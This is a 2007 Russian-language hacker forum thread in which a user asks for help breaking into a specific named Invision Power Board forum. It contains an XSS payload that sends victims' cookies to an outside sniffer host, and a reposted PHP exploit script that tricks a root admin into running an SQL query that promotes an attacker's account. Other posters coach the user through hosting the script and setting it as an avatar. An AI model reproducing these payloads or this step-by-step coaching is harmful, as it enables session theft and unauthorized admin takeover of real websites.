Помогите со взломом форума
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите со взломом форума - 2007-01-26 11:35:30.096666
|
|
|
mora
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-25 16:49:34.100000
|
Помогите со взломом форума : http://www.maniacs.ws/forum/index.php?
Я прочитал статью на античате, дела всё как сказано, но не получилось :(
Делал так:
Узнал версию форума (IPB 2.1.0)
Потом зарегил 2 пользователя, и отправил с одного на другого личное сообщение следующего содержания (
[ema*il]wj@wj[u*rl=http://www.wj.com`=`].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`)
Менял ссылку внутри на сайт форума который взломать пытался, приходило личное сообщение (привет) кода видно не было! Можно было нажать на слово привет как на ссылку.
Потом смотрел лог сниффера на античате, но там ничего нет!
Объясните, что я делаю не так?
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 11:38:15.320000
|
|
|
mora
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-25 16:49:34.100000
|
звёздочки внутри кода убирал )) и не катит )) может я ссылку внутри кода не ту пишу? Что там написать надо? url=?? .?
и ещё что это значит? : [email]wj@wj ??
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 14:00:24.613333
|
|
|
ВИТАХА
Сообщений: 1017
Оценки: 0
Присоединился: 2006-12-27 00:18:16.020000
|
А может этот баг просто уже залеплен,ты так не думаешь???попробуй другим способом.И еще это лишний рас доказывает что не надо делать по накатанной схеме а лучше перво наперво это подучить…
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 20:06:33.233333
|
|
|
mora
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-25 16:49:34.100000
|
подучить что именно? мне впринципе больше ничего не надо, только форумы…
вот нашёл готовые коды )) а сплоит компилировать под винду не могу имХо сцосу ))
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 21:21:19.653333
|
|
|
ВИТАХА
Сообщений: 1017
Оценки: 0
Присоединился: 2006-12-27 00:18:16.020000
|
Все тот же яваскрипт и пхп в придачу.
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 21:26:25.890000
|
|
|
XXpXX
Сообщений: 176
Оценки: 0
Присоединился: 2007-01-13 22:32:42.970000
|
www.hackzone.ru
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 21:29:02.393333
|
|
|
web_slayer
Сообщений: 932
Оценки: 0
Присоединился: 2006-12-15 23:59:09.653333
|
mora да просто на ачате осталось одно старьё 90-х годов.
Залепили этот баг давно. Я тож не раз делал всё по инструкции, но всё бестолку.
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-26 22:32:05.613333
|
|
|
k1ppregel
Сообщений: 171
Оценки: 0
Присоединился: 2006-11-14 00:20:22.693333
|
А может тебя на….ли с версией форума.
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-27 00:46:29.573333
|
|
|
User
Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
|
вот что нашел ЭТО ВЫЛОЖИЛ KROT_find :
Уязвимости форумов
Итак, в среду на багтраке появилось сообщение об уязвимости IPB <=2.1.7.
Уязвимым оказался скрипт кп админки. Если поставить вместо ссылки на аватару ссылку на пхп-сплоит, то при просмотре админом (это должен быть рут-админ) акка пользователя через контрпанельку имеется возможность выполнить скуль-комманды через IPB's SQL Toolbox.
Вот сам текст с багтрака:
Цитата:
From: Rapigator <rapigator_at_yahoo.com>
Date: Wed, 4 Oct 2006 11:58:38 -0700 (PDT)
Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High
An attack exists where an admin can be redirected and
forced to execute SQL commands through IPB's SQL
Toolbox.
The following requirements must be met for this attack
to take place:
- The database table prefix must be known
- The admin must have access to the SQL Toolbox (any
"root admin")
- The admin must have images and referers turned on in
their browser, and their browser must follow Location
headers (default behaviour for most browsers)
- The admin must view a malicious script as an image
in their browser.
This attack works invisibly to the admin because only
the image is redirected, not the page.
1st method:
In this method, any user can force the admin to
execute SQL commands.
1. A user sets their avatar to the malicious script's
address
2. The admin looks up the user's account in the Admin
CP
3. The user's avatar is shown and the admin is
redirected….
2nd method:
A restricted admin can add any HTML to a forum's
description(including javascript).
1. A restricted admin adds the malicious script as an
image to a forum's description.
2. Upon going to the "Manage Forums" link in Admin CP,
an unrestricted admin will be redirected and the SQL
will be executed.
Example malicious image script:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}membe rs+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1");
}
?>
http://seclists.org/bugtraq/2006/Oct/0049.html
Уязвимы версии:
Invision Power Board 2.0.x
Invision Power Board 2.1.0 - 2.1.7
Invision Power Board 2.2 Beta 1
Неуязвимы:
Invision Power Board 2.1.7 (ID: 21013.61005.s)
Invision Power Board 2.2 Beta 2
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-27 02:23:48.793333
|
|
|
mora
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-25 16:49:34.100000
|
quote:
ORIGINAL: REDsaratov
вот что нашел ЭТО ВЫЛОЖИЛ KROT_find :
Уязвимости форумов
Итак, в среду на багтраке появилось сообщение об уязвимости IPB <=2.1.7.
Уязвимым оказался скрипт кп админки. Если поставить вместо ссылки на аватару ссылку на пхп-сплоит, то при просмотре админом (это должен быть рут-админ) акка пользователя через контрпанельку имеется возможность выполнить скуль-комманды через IPB's SQL Toolbox.
Вот сам текст с багтрака:
Цитата:
From: Rapigator <rapigator_at_yahoo.com>
Date: Wed, 4 Oct 2006 11:58:38 -0700 (PDT)
Invision Power Board Multiple Vulnerabilities
Affects: IPB <=2.1.7
Risk: High
Example malicious image script:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}membe rs+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1");
}
?>
http://seclists.org/bugtraq/2006/Oct/0049.html
Уязвимы версии:
Invision Power Board 2.0.x
Invision Power Board 2.1.0 - 2.1.7
Invision Power Board 2.2 Beta 1
Неуязвимы:
Invision Power Board 2.1.7 (ID: 21013.61005.s)
Invision Power Board 2.2 Beta 2
Здравствуйте, спасибо за помощь, вот только некоторых вещей из вашего сообщения я не понял:
1) Кто такой рут админ?
2) Что такое скуль команды и как их выполнить?
4) Мне нужно сделать свой сайт, закинуть туда этот код а потом вместо аватара втыкнуть ссылку на мой сайт с кодом?
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-27 19:42:28.323333
|
|
|
ZneP
Сообщений: 910
Оценки: 0
Присоединился: 2006-08-21 16:11:47
|
1) это боГ
2) в данном случае (UPDATE) - запрос к БД на изменение данных. Сами выполнятся, как только боГ перейдет по ссылке
3) да
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-28 00:27:08.900000
|
|
|
mora
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-25 16:49:34.100000
|
извените, а где мне смотреть результат того, что произойдёт после того, как бог тыкнет на аватару?
и как мне залить ссылку на сайт в аватару?
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-28 00:50:06.013333
|
|
|
User
Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
|
понимаешь если тебе все сказать и все показать то ты не научишться никогда! тебе дали столько материала!пробуй пытайся а потом по ходу дела что не получается — спрашивай!
|
|
|
|
|
RE: Помогите со взломом форума - 2007-01-28 20:05:26.510000
|
|
|
mora
Сообщений: 11
Оценки: 0
Присоединился: 2007-01-25 16:49:34.100000
|
вот что спросить хочу, на каком хосте php поддерживается? и надо ли вначале печатать <html> или сразу php?
И как мне в аватару запхнуть! Пишут что не формат изображения!
|
|
|
|
|
|
